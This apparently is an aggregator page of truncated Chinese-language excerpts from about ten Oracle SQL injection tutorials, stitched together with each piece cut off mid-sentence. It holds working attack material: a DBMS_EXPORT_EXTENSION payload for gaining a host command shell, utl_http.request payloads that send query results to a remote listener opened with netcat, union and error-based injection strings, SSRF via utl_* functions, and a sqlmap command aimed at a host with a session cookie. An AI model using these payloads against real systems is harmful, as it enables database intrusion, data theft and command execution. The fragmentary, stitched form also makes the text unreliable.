介绍一个在web上通过oracle注入直接取得主机cmdshell的方法. 以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 的形式即可.(用" 'a'|| "是为了让语句返回true值) 语句有点长,可能要用post提交. 以下是各个步骤:…

Oracle注入之带外通信和DNSLOG注入非常相似,例如和mysql中load_file()函数实现无回显注入非常相似. 下面介绍这个技术中常用的函数和使用. 环境这里准备两台测试,一台注入点的靶机,一台接受回显数据的平台. 接受的数据的靶机: nc -vvlp 0x01 utl_http.request()函数 通过utl_http.request我们可以将查询的结果发送到远程服务器上,在遇到盲注时非常有用,要使用该方法用户需要有utl_http访问网络的权限. 检测是否支持utl_http…

小结: Union联合查询: order by 定字段 and 1=2 union select null,null..... from dual 然后一个一个去判断字段类型,方法如下 and 1=2 union select 'null',null...... from dual 返回正常,说明第一个字段是字符型,反之为数字型 第一个字段是字符型,判断第二个字段类型: and 1=2 union select 'null','null'...... from dual 返回正常,说明第二个字段…

注:下面的一部分查询只能由admin执行,我会在查询的末尾以"-priv“标注. 探测版本: SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance; 注释: SELECT 1 FROM dual — comment 注: Oracle的SELECT语句必须包含FRO…

(1)nullif: NULLIF:如果exp1和exp2相等则返回空(NULL),否则返回第一个值 真: 假: (2)nvl/nvl2 测试失败无法实现:)记录   (3)如果是oracle报错注入,尝试dbms_*系列: 举一个例子: (4)utl_*_*   (ssrf) 举一个例子: 可以导致ssrf攻击 如果没过滤select 和from,可直接外带数据出来: select * from t_user where name='admin'||utl_http.request('http…

Oracle 查询出所有的表 select * from all_tables 查询出当前用户的表 select * from user_tables 查询出所有的字段 select*from all_tab_columns 查询出当前用户的字段 select*from user_tab_columns 查版本 select*from v$version 查询第一行 select * from all_tables where rownum=1 查询多行,参考实现limit的功能的 实现limi…

这个注入挺特殊的,是ip头注入.我们进行简单的探测: 首先正常发起一次请求,我们发现content-type是76 探测注入我习惯性的一个单引号: 一个单引号我发现长度还是76 我开始尝试单引号,双引号一起: 我失败了长度还是76 一般sql注入输入单引号一般长度都会有些变化. 我记录深入探测,我输入'--%20 返回了200,并且长度是0,这让我产生了一丝好奇.这里很有可能存在注入哦. 我继续探测: 输入--%20 嘶!我不禁开始怀疑这里是不是本身就不存在安全问题呢? 我都感觉像是数字类型了,…

sqlmap.py -u "http://10.7.82.123:9104/servlet/json" --cookie="JSESSIONID=abcgk26KDf_5B5pwgmUxv; userInfo=%7B%22login_id%22:%22admin%22,%22name%22:%22%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%91%98%22,%22user_id%22:%221%22,%22last_time%22:%222…

0x00 前言 在oracle注入时候出现了数据库报错信息,可以优先选择报错注入,使用报错的方式将查询数据的结果带出到错误页面中. 使用报错注入需要使用类似 1=[报错语句],1>[报错语句],使用比较运算符,这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式. 判断注入 http://www.jsporcle.com/news.jsp?id=1 and (select count (*) from user_tables)>0 -- http://www.j…

Oracle常规联合注入 Oracle Database,又名Oracle RDBMS,或简称Oracle.是甲骨文公司的一款关系数据库管理系统. Oracle对于MYSQL.MSSQL来说意味着更大的数据量,更大的权限. oracle注入中需要注意的一些小点: Oracle 在使用union 查询的跟Mysql不一样Mysql里面我用1,2,3,4就能占位,而在Oracle里面有比较严格的类型要求.也就是说你union select的要和前面的字段类型一样,我们可以用null来代替站位. Or…